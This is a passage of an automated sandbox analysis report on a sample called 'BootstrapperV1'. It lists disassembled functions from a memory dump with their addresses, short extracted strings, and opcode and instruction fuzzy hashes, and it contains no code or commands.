                                                                                                                                                        • Instruction ID: 73130824ad4f06e3536201bad32f1cbc0b3c0e7daa1930d4a4d990467ee5e6ba
                                                                                                                                                        • Opcode Fuzzy Hash: 9f0c193524c3004dfbbd64b68a255a67a021a6564148eb45342047e5c0660c04
                                                                                                                                                        • Instruction Fuzzy Hash: 43628730A19A4E8FEB94EF1CC459AA977E2FF59700F0141B9E44DD7291DE38EC458B81
                                                                                                                                                        Function 00007FFAAC5A2540 Relevance: .6, Instructions: 621COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 0b46e2220bd63b7257cada3d25727f7fb20df79a34623185ca3ed76313619ade
                                                                                                                                                        • Instruction ID: de3eee87a743015d4ce7d2716553f83fad4309e939ee6dfd67563a5d6cda1b48
                                                                                                                                                        • Opcode Fuzzy Hash: 0b46e2220bd63b7257cada3d25727f7fb20df79a34623185ca3ed76313619ade
                                                                                                                                                        • Instruction Fuzzy Hash: CD22F67051DB868FE759DB28C4496A5BBE1FF66700F04C6BEE04EC7292DE24E849C781
                                                                                                                                                        Function 00007FFAAC59A7DA Relevance: 3.1, Strings: 2, Instructions: 551COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: vX_H$yX_H
                                                                                                                                                        • API String ID: 0-3491284542
                                                                                                                                                        • Opcode ID: 250f82cc950fac86179e540776004a938648f986abfd61b1b97081886a8a0a54
                                                                                                                                                        • Instruction ID: da293327357cfeba0c8be7397ed1dfdad6112e0f4328a7390c50701c14d6033e
                                                                                                                                                        • Opcode Fuzzy Hash: 250f82cc950fac86179e540776004a938648f986abfd61b1b97081886a8a0a54
                                                                                                                                                        • Instruction Fuzzy Hash: 1C120071E5991A8BFBA4DB1CD8997E877E5FB59300F1041F5E00DE3292CE39AD828B50
                                                                                                                                                        Function 00007FFAAC5A79D0 Relevance: 2.1, Strings: 1, Instructions: 809COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: \
                                                                                                                                                        • API String ID: 0-2967466578
                                                                                                                                                        • Opcode ID: 49ae32e59a03694942698e920ee2d38c3847134de4a2c6cfba972692ce61502c
                                                                                                                                                        • Instruction ID: d2506fa8d7ed6395aabb3c6fdf1743668ac56ffddeb59ac4220b6c6cdb293f0e
                                                                                                                                                        • Opcode Fuzzy Hash: 49ae32e59a03694942698e920ee2d38c3847134de4a2c6cfba972692ce61502c
                                                                                                                                                        • Instruction Fuzzy Hash: EC422270A5DB46CFF71C9B2984596B577D5EF86700F0480BEE08FC3292DD28A84A87D2
                                                                                                                                                        Function 00007FFAAC59C419 Relevance: 1.8, Strings: 1, Instructions: 531COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: ^
                                                                                                                                                        • API String ID: 0-1590793086
                                                                                                                                                        • Opcode ID: 14220f4c1fa93c3eb5cfc0a8fe609af654dd8ee6fc959ca25bdd7bfaa6689ed1
                                                                                                                                                        • Instruction ID: 435ff938edf1a53f55dd12695e2bf1b8d9158d7e8ed9d8e6c438568e6d2b55e8
                                                                                                                                                        • Opcode Fuzzy Hash: 14220f4c1fa93c3eb5cfc0a8fe609af654dd8ee6fc959ca25bdd7bfaa6689ed1
                                                                                                                                                        • Instruction Fuzzy Hash: 20E1E367A8E6978BF211676CF8650F93B84DF87335B1881B7E18CCA193DD0DB44A42E1
                                                                                                                                                        Function 00007FFAAC59C0E0 Relevance: 1.7, Strings: 1, Instructions: 427COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: bS
                                                                                                                                                        • API String ID: 0-290453937
                                                                                                                                                        • Opcode ID: 867b86da68dcc116f60fab540cf7d0e5a9523e6c823657e783ffae226e772c2e
                                                                                                                                                        • Instruction ID: 2d862078439e5724d7e29343aac3f8c8cf033238274c7c9f7969552f5c541f07
                                                                                                                                                        • Opcode Fuzzy Hash: 867b86da68dcc116f60fab540cf7d0e5a9523e6c823657e783ffae226e772c2e
                                                                                                                                                        • Instruction Fuzzy Hash: BDB13262B4ED0B8FFBA8A25C646927427C5EB9B251B1081F7E48EC72D1DD1DEC0A43C1
                                                                                                                                                        Function 00007FFAAC5AF799 Relevance: 1.7, Strings: 1, Instructions: 425COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: +L_H
                                                                                                                                                        • API String ID: 0-1792215998
                                                                                                                                                        • Opcode ID: 593e55b1168ba1ea9e9b0cc28836b919d6150b9a765222ccc304f68b58ba82be
                                                                                                                                                        • Instruction ID: 8360e3851a45c29fc2f15a134c64b181ff7e6ddbcce0d50964e5139b1192b833
                                                                                                                                                        • Opcode Fuzzy Hash: 593e55b1168ba1ea9e9b0cc28836b919d6150b9a765222ccc304f68b58ba82be
                                                                                                                                                        • Instruction Fuzzy Hash: B6B15872A1DA4B4FF748DB6C98495B937D5EBA6750B04827EE44EC3293ED24E80783C1
                                                                                                                                                        Function 00007FFAAC59B09A Relevance: 1.7, Strings: 1, Instructions: 423COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: d
                                                                                                                                                        • API String ID: 0-2564639436
                                                                                                                                                        • Opcode ID: 4f4a7cf7504a1d29b9e9ef8cf9c55396c43fe87c3d3ecf0cd87718c0aed6f2bf
                                                                                                                                                        • Instruction ID: 41ea904542cb68f5348fa07ec5972fb37605aa6d59c2f36f544921adaaa36488
                                                                                                                                                        • Opcode Fuzzy Hash: 4f4a7cf7504a1d29b9e9ef8cf9c55396c43fe87c3d3ecf0cd87718c0aed6f2bf
                                                                                                                                                        • Instruction Fuzzy Hash: 6FC11230A5DB468FF769DB18C44153577E5FF96300B1489BEE08EC7292DE2AE8468781
                                                                                                                                                        Function 00007FFAAC5993B0 Relevance: 1.6, Strings: 1, Instructions: 390COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: d
                                                                                                                                                        • API String ID: 0-2564639436
                                                                                                                                                        • Opcode ID: 7b64d1af8c845b806f8ed940f7ee8b98d4c0690b9569850765095456b7188e6d
                                                                                                                                                        • Instruction ID: ae8731d2513949c08bed88cbfdcd205be67666ed197396a1251b19f25121e016
                                                                                                                                                        • Opcode Fuzzy Hash: 7b64d1af8c845b806f8ed940f7ee8b98d4c0690b9569850765095456b7188e6d
                                                                                                                                                        • Instruction Fuzzy Hash: A4C1C07065CB468FE768DB18D441535B3E5FF96300B1489BDE08EC3696DA3AF8468B81
                                                                                                                                                        Function 00007FFAAC597D58 Relevance: 1.6, Strings: 1, Instructions: 387COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: H
                                                                                                                                                        • API String ID: 0-2852464175
                                                                                                                                                        • Opcode ID: ba061c55725e47ad596d5cf7f58681ea028f5cdc9d233a6b96f2ff285f0a3bf0
                                                                                                                                                        • Instruction ID: babfd564733db14bffee8350a4df61483af64ba66ee10469d1cae50fc8c472ea
                                                                                                                                                        • Opcode Fuzzy Hash: ba061c55725e47ad596d5cf7f58681ea028f5cdc9d233a6b96f2ff285f0a3bf0
                                                                                                                                                        • Instruction Fuzzy Hash: 8DB13B61B1D94A8FFB88EB2DC84AA7537D5EF9A710B0081B9E44EC7293DD14EC4683C1
                                                                                                                                                        Function 00007FFAAC5A9860 Relevance: 1.6, Strings: 1, Instructions: 378COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: d
                                                                                                                                                        • API String ID: 0-2564639436
                                                                                                                                                        • Opcode ID: 742461c2ae8358a68bddc6ed2a52b0c9ae2dd625343a075950ae72fc0b637d61
                                                                                                                                                        • Instruction ID: d3bec4826f8da0d06fd5daa2c5e856a7d4533c95f8d6e2c755771df7c9134cbf
                                                                                                                                                        • Opcode Fuzzy Hash: 742461c2ae8358a68bddc6ed2a52b0c9ae2dd625343a075950ae72fc0b637d61
                                                                                                                                                        • Instruction Fuzzy Hash: 90B1DD30A58B0A8FE728DB19C445536B7E5FF9A700B548A7DE08EC3692DA35F84787C1
                                                                                                                                                        Function 00007FFAAC5948E0 Relevance: 1.6, Strings: 1, Instructions: 330COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: ?L_H
                                                                                                                                                        • API String ID: 0-3047738230
                                                                                                                                                        • Opcode ID: 551d3279a945e0c6bba90b5bbf74360627fe474a9400f191916f586c9c1178e1
                                                                                                                                                        • Instruction ID: 7f088d088ce36eca0d2bf0ba57af80a8b6f9ab31d8520c08337f61dad5ebd2b2
                                                                                                                                                        • Opcode Fuzzy Hash: 551d3279a945e0c6bba90b5bbf74360627fe474a9400f191916f586c9c1178e1
                                                                                                                                                        • Instruction Fuzzy Hash: DAB12320A8D7478FF764AB3684582B977D9EF47710F0481BAE06EC71C3DD6CA8598391
                                                                                                                                                        Function 00007FFAAC595918 Relevance: 1.5, Strings: 1, Instructions: 275COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: \S_H
                                                                                                                                                        • API String ID: 0-2336323542
                                                                                                                                                        • Opcode ID: dea9dfcbc5f2173f6056cf5c2b9a4ed6ab930904b60316ccfa9fd58a4578131d
                                                                                                                                                        • Instruction ID: 697424415e5c4f057adc0c5085ea36c475f990521a8919247e4537dfebab220c
                                                                                                                                                        • Opcode Fuzzy Hash: dea9dfcbc5f2173f6056cf5c2b9a4ed6ab930904b60316ccfa9fd58a4578131d
                                                                                                                                                        • Instruction Fuzzy Hash: D0716B52B5DA868FF79497BD585D6B47BC5EF9A610B0840FAE04DC72E3DD089C0A83C1
                                                                                                                                                        Function 00007FFAAC5AD668 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: dL_H
                                                                                                                                                        • API String ID: 0-2846114773
                                                                                                                                                        • Opcode ID: 8caa482c0a6cccd4a1b1e1c25d14e643d5db7e8f9703564ad9271e2aeb5e24f3
                                                                                                                                                        • Instruction ID: fb6d64f711e1a91a7c0aff594187f3c10ec76b04e23a3714415196c31444d221
                                                                                                                                                        • Opcode Fuzzy Hash: 8caa482c0a6cccd4a1b1e1c25d14e643d5db7e8f9703564ad9271e2aeb5e24f3
                                                                                                                                                        • Instruction Fuzzy Hash: 8F517A2270EA4F8FE798E76D58192703BC5EB9A76070482BBE00DCB192DD18DC0A47C1
                                                                                                                                                        Function 00007FFAAC596C90 Relevance: 1.5, Strings: 1, Instructions: 245COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: #T_H
                                                                                                                                                        • API String ID: 0-3176321433
                                                                                                                                                        • Opcode ID: 0cec6e49a467d5ddc9abee76a9eab8a87e6cc21cbcb18c785fb58746f17f120a
                                                                                                                                                        • Instruction ID: c31e30866f1151540519b56ae385f738649454f2c904161ea41ed04e19b7ead6
                                                                                                                                                        • Opcode Fuzzy Hash: 0cec6e49a467d5ddc9abee76a9eab8a87e6cc21cbcb18c785fb58746f17f120a
                                                                                                                                                        • Instruction Fuzzy Hash: E271FE30A5994ECFEF84DF58C495AA977E5FF69341F4041BAF40ED32A1CA29E845C780
                                                                                                                                                        Function 00007FFAAC59D173 Relevance: 1.5, Strings: 1, Instructions: 225COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: rM_^
                                                                                                                                                        • API String ID: 0-700486896
                                                                                                                                                        • Opcode ID: e2a4a1ef3dac0700481f4e8a513ff88252f889b39c95904abb10d54c002db9ea
                                                                                                                                                        • Instruction ID: ee44bf7afd7b8c582e15a77fdef74571c4f0c684d75844b86a6531cf78157c25
                                                                                                                                                        • Opcode Fuzzy Hash: e2a4a1ef3dac0700481f4e8a513ff88252f889b39c95904abb10d54c002db9ea
                                                                                                                                                        • Instruction Fuzzy Hash: B051C457A4D2968BE611B77CF8A95F93F90DF46325708C1F3E08DCE1A3DC09A44A8295
                                                                                                                                                        Function 00007FFAAC597C50 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: _
                                                                                                                                                        • API String ID: 0-701932520
                                                                                                                                                        • Opcode ID: 3122353917e264ee834bdf07186176cb30cd6aab546d93fe5fdbcf31483f4151
                                                                                                                                                        • Instruction ID: 5e803ddb53786b1ab0c1bd4df9c126e148136133f464edc7a83a842c582bf16c
                                                                                                                                                        • Opcode Fuzzy Hash: 3122353917e264ee834bdf07186176cb30cd6aab546d93fe5fdbcf31483f4151
                                                                                                                                                        • Instruction Fuzzy Hash: B9314A2394D6968FE325A73CE8666E53BD4DF47220B0881F7E08DCB1A3DD0D984A83D1
                                                                                                                                                        Function 00007FFAAC5AF6D8 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: ML_^
                                                                                                                                                        • API String ID: 0-2152338992
                                                                                                                                                        • Opcode ID: e991aeecdd9cb4dcb8008b5b01c4ed513636e99b7e98edb1d553e4a5fd82fef0
                                                                                                                                                        • Instruction ID: 28323283f936139d7f4d2b9fb10926ab7d1244b10e649c617df6c01a794e8404
                                                                                                                                                        • Opcode Fuzzy Hash: e991aeecdd9cb4dcb8008b5b01c4ed513636e99b7e98edb1d553e4a5fd82fef0
                                                                                                                                                        • Instruction Fuzzy Hash: B2219E62E8F41787F61573FEB81A4FC62849F86B65F24C232E10DC22A3CC19A44912E2
                                                                                                                                                        Function 00007FFAAC597404 Relevance: .6, Instructions: 587COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 4e31235c918a96feeae8e669221bff0a95f34ed3a2c87bb9be92f7ddf4763ee0
                                                                                                                                                        • Instruction ID: bdc9f1b790ff057b20de3636c5f475e0a401efdc1ba821fb2c10b24142e72a49
                                                                                                                                                        • Opcode Fuzzy Hash: 4e31235c918a96feeae8e669221bff0a95f34ed3a2c87bb9be92f7ddf4763ee0
                                                                                                                                                        • Instruction Fuzzy Hash: BA02B43060DA4A8FE759DB28C4556B57BE1FF95300F1482BEE48EC7292DE29E84687C1
                                                                                                                                                        Function 00007FFAAC59FA56 Relevance: .6, Instructions: 581COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 89f45569b6b1aa39d07b6e9d773e1317291d09331d4520b8a5df80bb8fae896b
                                                                                                                                                        • Instruction ID: 5903a4348d0d8cc80e63475f332c3cf329ab5b9eb168e824cdafc77a0cf548d3
                                                                                                                                                        • Opcode Fuzzy Hash: 89f45569b6b1aa39d07b6e9d773e1317291d09331d4520b8a5df80bb8fae896b
                                                                                                                                                        • Instruction Fuzzy Hash: D802F97061CB8A8FF754EB6884556B9B7D2FF95340F0486BEE08DC3252DE39E8458782
                                                                                                                                                        Function 00007FFAAC595968 Relevance: .6, Instructions: 572COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 22c38f81b3380c33cfdc4d013d6253e660737512aac2d4d0a4d97dc9e5cc5af2
                                                                                                                                                        • Instruction ID: 854de03b190a0b3d1380d17b449174863878e4b823b226765a8b06ecbbe35959
                                                                                                                                                        • Opcode Fuzzy Hash: 22c38f81b3380c33cfdc4d013d6253e660737512aac2d4d0a4d97dc9e5cc5af2
                                                                                                                                                        • Instruction Fuzzy Hash: 3402D870A1CB4A8FF754EB6884556B9B7D2FF95350F0086BEE08DC3252DE39E8458782
                                                                                                                                                        Function 00007FFAAC5959E8 Relevance: .6, Instructions: 570COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: b4f75918dbc43de465dd7db0b2d3d76a964dc6cd2c9bb65886a9319be7887ee8
                                                                                                                                                        • Instruction ID: 28afc6ce62e4d9c898542df68cdb90949954f1383f3654f67ba324f60ba57bd0
                                                                                                                                                        • Opcode Fuzzy Hash: b4f75918dbc43de465dd7db0b2d3d76a964dc6cd2c9bb65886a9319be7887ee8
                                                                                                                                                        • Instruction Fuzzy Hash: 96F11831B2DA4A8FF794EB2C945967877C2FFD9750B4042BAE00EC72A6ED18DC464381
                                                                                                                                                        Function 00007FFAAC5A6F9D Relevance: .5, Instructions: 534COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 411ad81826585ddabddd9cdf5c64e79cf90aa027b7146ec747216db589a3463a
                                                                                                                                                        • Instruction ID: 9e8802ac7ffc6d656448fb861e19c33c5027597e532b973f8f12d4cbe8ec54e9
                                                                                                                                                        • Opcode Fuzzy Hash: 411ad81826585ddabddd9cdf5c64e79cf90aa027b7146ec747216db589a3463a
                                                                                                                                                        • Instruction Fuzzy Hash: 6CF12621B5DB8ACFFB45A778541A6B87BD5EF4A650F0481FAE04DC3293DD2CE8468381
                                                                                                                                                        Function 00007FFAAC5A6EAC Relevance: .4, Instructions: 444COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 66f015cd357925097dc5f0724b26c1e36015a9b76ecda9240d83723bd35796bc
                                                                                                                                                        • Instruction ID: b9d01541fa02d50f52237c114ba58ca2313558edc36435f809cfd454f6f60a5d
                                                                                                                                                        • Opcode Fuzzy Hash: 66f015cd357925097dc5f0724b26c1e36015a9b76ecda9240d83723bd35796bc
                                                                                                                                                        • Instruction Fuzzy Hash: 00C11830B5DA4A8FEB84E73C84596797BD6EF5A25070541FAE04DC72A3DD2DEC068381
                                                                                                                                                        Function 00007FFAAC5A55A9 Relevance: .4, Instructions: 437COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 3bcd1557f7288655ae6005d9d610ba75385836be6ed700cf54421854be533cbc
                                                                                                                                                        • Instruction ID: ba3acf8bbf8cc589d1e161905ba6572411248693bad776172d629c303ab25132
                                                                                                                                                        • Opcode Fuzzy Hash: 3bcd1557f7288655ae6005d9d610ba75385836be6ed700cf54421854be533cbc
                                                                                                                                                        • Instruction Fuzzy Hash: 89D13860A4EA07CFFB29972944956B977D9EF47B10FA1817AE08FC71C2CD1DA84A43C1
                                                                                                                                                        Function 00007FFAAC5A0FE6 Relevance: .4, Instructions: 407COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: c7708a2746e18a7d6a025365e247b170a0388f9902ffdfafb0539d6fb189e80a
                                                                                                                                                        • Instruction ID: b9ff704ece4d307388acb4b1437118ff82d76cb8ec15cc316febd1a00508da16
                                                                                                                                                        • Opcode Fuzzy Hash: c7708a2746e18a7d6a025365e247b170a0388f9902ffdfafb0539d6fb189e80a
